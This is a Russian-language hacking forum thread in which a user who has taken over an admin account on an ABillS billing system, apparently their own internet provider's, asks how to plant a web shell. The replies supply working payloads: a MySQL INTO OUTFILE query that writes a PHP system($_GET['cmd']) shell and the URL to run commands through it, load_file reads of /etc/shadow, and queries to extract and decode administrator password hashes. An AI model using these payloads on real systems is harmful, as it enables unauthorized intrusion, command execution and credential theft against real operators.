нужна помощь(abbills)
 

Может для когото вопросы покажутся и "детскими", но все-же:
Нарыл акк админа, очень бы хотелось залить шелл.В системе присутствует sql commander. Но или я тупой :mad: или коммандер какой-то не такой :confused:(скорее всего первое :( )
сайт разработчкика
Делаю запрос например на вывод других админов в системе в ответ выплевывает Как вывести на нормальном языке?
Проблема прядли с кодировками, т.к информация (имена пользователей, включая другую информацию)не считая паролей, выводятся в читабельном виде.
По поводу шела into outfile как и load не получается использовать (выскакивает ошибка error select tables from blabla).
-------------------------------
какие есть варианты?

ну с этим возни больше будет, а вот что с шеллом не получается? напиши конкретно какой запрос делаешь и какую ошибку выкидывает, ну вообщем поподробнее опиши свои действия.

система работает на базе ".cgi"
user:abills@localhost
database:abills
version:5.0.51a-log
information_schema выводит
----------------------------------------
SELECT load_file('/etc/hosts') результат Ok
Но вывода файла нет =(
select load_file('/etc/shadow') ok
на права не ругается, значит доступ есть, но опять таки вывода файла нет.
---------------------------------------
Дальше колупать(не зная) стремно, как никак мой пров ))
---------------------------------------
Может кто подскажет как быть с выводом? или может с заливкой шелла?

так что те мешает найти папку для записи и потом выполнить запрос
select '<?php system($_GET["cmd"]); ?>' from mysql.user into outfile 'C:\www...ну вообщем путь до папки для записи (например С\www\tmp\) \ shell.php'

ну и потом просто http:\\путь до файла\shell.php?cmd=команда(напри мер dir)


p.s. исправил вчера забыл дописать from xd

похожая проблема с выводом паролей

__https://forum.antichat.ru/thread71538.html

может хеш такой?

попробуй вот так
select user,cast(password as binary) from admins

мешает по идее фильтр. Даже при кодировке 0х+hex вылазит одна и таже ошибка

[3] ERROR_SQL /select `
или [3] ERROR_SQL/select (сам запрос)

Я с этим sql commanderом не встречался, но ситуация была похожая. Когда ты делаешь select '<?php system($_GET["cmd"]); ?>' from mysql.user into outfile 'C:\www... , уверен, что количество столбцов в первом и втором selecte совпадает?

Пробовал вот так
select 1,2,'<?php system($_GET["cmd"]); ?>',4 from mysql.user into outfile 'C:\www... ?

Все кто отвечал так и не смотрели исходники :(. Сам вот добрался немного посмотрел(хоть сильно в этом и не разбираюсь)
так вот пароли выводятся криво из за функции encode
как составить запрос для правильного вывода? Как я понял нужно использовать decode. А по поводу встроенного в систему sql commander-a может кто-то все таки не поленится и попробует систему в действии чтобы дать дельный совет по поводу шелла? буду признателен